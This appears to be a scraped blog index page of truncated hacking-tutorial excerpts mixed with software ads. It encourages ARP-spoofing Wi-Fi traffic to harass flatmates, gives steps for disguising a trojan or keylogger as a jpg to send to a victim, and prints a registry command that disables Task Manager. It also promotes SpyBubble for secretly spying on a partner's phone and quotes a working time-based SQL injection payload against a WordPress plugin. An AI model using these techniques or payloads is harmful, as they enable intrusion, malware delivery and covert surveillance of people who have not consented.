Its not tough to Hijack / Capture / Sniff Wifi Traffic on almost any network as long as you are connected to it. Once you apply all the correct tricks, all future traffic for Wifi clients i.e. laptops, mobiles will be routed from your PC, giving you every bit of information about what others are doing on the network.
How to Hijack/Capture/ Sniff HTTP traffic
We will be using ARP and iptables on a Linux machine to accomplish most of the stuff. It’s an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.
Warning:- Do not attempt to do this on a Public Wifi or a Corporate Wifi ... Read more »
Norton™ Mobile Security Lite protects your mobile device against loss, theft and malware. Norton lends its anti-malware, anti virus, and security expertise to mobile. Your life and your important Stuff is on your phone. Keep it safe with Norton™ Mobile Security Lite for Android.
FREE ANTIMALWARE PROTECTION that eliminates viruses and malware before they infect your phone:
• Automatic antivirus scan for downloaded apps and app updates to protect against threats
Most of you guys must be knowing it by now, if not you can know it now.This is a good trick to hide your exe files into a jpg file.How about sending a trojan or a keylogger into your victim using this trick..?
1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.
2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)
3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'
4) Windows is going to warn you if you really want to change this extension from exe ... Read more »
Uget (formerly urlgfe) is a Free and Open Source download manager written in GTK+ , it has many of features like easy-to-use , cross-platform (Windows & GNU/Linux) , support pause and resume , classify download , every category has an independent configuration.
Uget has many features like :
Free (as in freedom , also free of charge ) and Open Source .
Simple , easy-to-use and lightweight .
... Read more »
Many of you faced the problem that after virus infect your computer your Task Manager is disabled. Here is the tutorial which hep you to reclaim your task manager in a flash.
For this you need a .reg script
Just copy this code in notepad and save as disabletaskmanger.reg . Double click on it to disable the taskmanager.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
Just copy this code in notepad and save as enbletaskmanger.reg . Double click on it to enable the taskmanager.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Di ... Read more »
Mobile spying is the basic need of anyone these days and i got lots of cases from people like Girl Friend wants to spy on the boyfriend or Wife wants to spy on the husband or may be visa-verse. Anyways bottom line for today's article is how to spy a cellphone. Here i will talk about a Application software called SpyBubble. SpyBubble is a software that allows you to log in from any computer and access any smartphone that it is installed on. Through SpyBubble, you can monitor and supervise any smartphone simply by entering your login username and password.
Spybubble has the following features that can be very useful in certain situations:-
Phrack is one of the remarkable underground hacking magazines i ever red. First time i heard about this magazine from Rishab Dhangwal The Tech Tank. And after that today i am a big fan of Phrack.
According to Wikipedia Phrack is an ezine written by and for hackers first published November 17, 1985.Described by Fyodor as "the best, and by far the longest running hacker zine," the magazine is open for contributions by anyone who desires to publish remarkable works or express original ideas on the topics of interest.
It has a wide circulation which includes both hackers and computer security professionals.Originally covering subjects related to phreaking and telephone system hacking, anarchy and cracking,the articles ... Read more »
Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process. Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozil ... Read more »
# Exploit Title: WordPress AdRotate plugin <= 3.6.5 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ad....3.6.5.zip
# Version: 3.6.5 (tested)
# Note: magic_quotes has to be turned off
http://www.site.com/wp-content/plugins/a...p?track=1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23
Vulnerable code ... Read more »
Many people mailing me to ask what kind of password they should have for their Email accounts for social networking sites. Ok here i am with the article in this article i will tell u what kind of password you need to protect your password. But before that lets ahve a laughing session.Here is a list of people with some funny facts:-
A boyfriend will be having password like Bike's Number, Car's Number , And yaa how i can skip that their Girl Friends Name or her cell no :P. So its very easy to guess this kind of password if you knw the guy a bit.
Second max people who comes under email hacking are business man and mostly married people whoa re having their passwords like Wife's Name, iluvmywife, Name of their children and this kind of ..
Well I suggest you shoudl have a complex password or robust password.
Complex Password :- *&r@hu7&*
... Read more »